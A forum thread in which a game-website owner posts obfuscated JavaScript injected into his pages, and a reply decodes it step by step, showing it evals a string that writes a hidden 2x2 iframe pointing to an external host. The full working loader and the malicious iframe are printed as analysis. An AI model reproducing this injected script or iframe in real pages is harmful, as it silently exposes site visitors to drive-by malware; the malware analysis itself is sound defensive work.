Website Hacked. Worth a look.
Hey guys I run a small website dedicated to a game, anyway I noticed some code had been injected onto each of my main pages, has anyone seen this code before or identify what it does? It took out my forums and messed a little with my CSS, but no serious damage.
Anyway something that I came across that I thought may also interest you.
markup<script>try{asdwqe();}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=window["eva"+"l"];n="104.90.800.999.792.1053.872.909.880.1044.368.1071.912.945.928.909.320.351.480.945.816.1026.776.981.808.288.920.1026.792.549.272.936.928.1044.896.522.376.423.824.1035.856.909.960.459.384.414.840.990.376.945.880.414.792.927.840.567.448.306.256.990.776.981.808.549.272.756.952.945.928.1044.808.1026.272.288.920.891.912.999.864.972.840.990.824.549.272.873.936.1044.888.306.256.918.912.873.872.909.784.999.912.900.808.1026.488.306.880.999.272.288.776.972.840.927.880.549.272.891.808.990.928.909.912.306.256.936.808.945.824.936.928.549.272.450.272.288.952.945.800.1044.832.549.272.450.272.558.480.423.840.918.912.873.872.909.496.351.328.531.104.90".split(".");h=2;s="";if(window.document)for(i=0;-158+i<0;i=1+i){k=i;s=s+String[f](n[k]/(i%(h)+8));}e(s);}}</script>
It calls eval on this string:
markup"\r\ndocument.write('<iframe src=\"http://gskex30.in/in.cgi?8\" name=\"Twitter\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height=\"2\" width=\"2\"></iframe>');\r\n"
The relevant code is within the last catch block:
// e = eval
e = window["eva"+"l"];
// the encrypted string
n = "104.90.800.999.792.1053.872.909.880.1044.368.1071.912.945.928.909.320.351.480.945.816.1026.776.981.808.288.920.1026.792.549.272.936.928.1044.896.522.376.423.824.1035.856.909.960.459.384.414.840.990.376.945.880.414.792.927.840.567.448.306.256.990.776.981.808.549.272.756.952.945.928.1044.808.1026.272.288.920.891.912.999.864.972.840.990.824.549.272.873.936.1044.888.306.256.918.912.873.872.909.784.999.912.900.808.1026.488.306.880.999.272.288.776.972.840.927.880.549.272.891.808.990.928.909.912.306.256.936.808.945.824.936.928.549.272.450.272.288.952.945.800.1044.832.549.272.450.272.558.480.423.840.918.912.873.872.909.496.351.328.531.104.90".split(".");
h = 2;
s = "";
if (window.document)
// decrypt the string
for (i=0; -158+i<0; i=1+i) {
k = i;
// String[f] is actually String.fromCharCode
// f was set in the first catch block
s = s + String[f](n[k] / (i % (h) + 8));
}
// eval the string
e(s);
It writes this iframe to your site:
markup<iframe src="http://gskex30.in/in.cgi?8" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>
If you don't know what an iframe is, google it.
As to how they got it into the site, all I can say for sure is, they took advantage of a vulnerability in your code.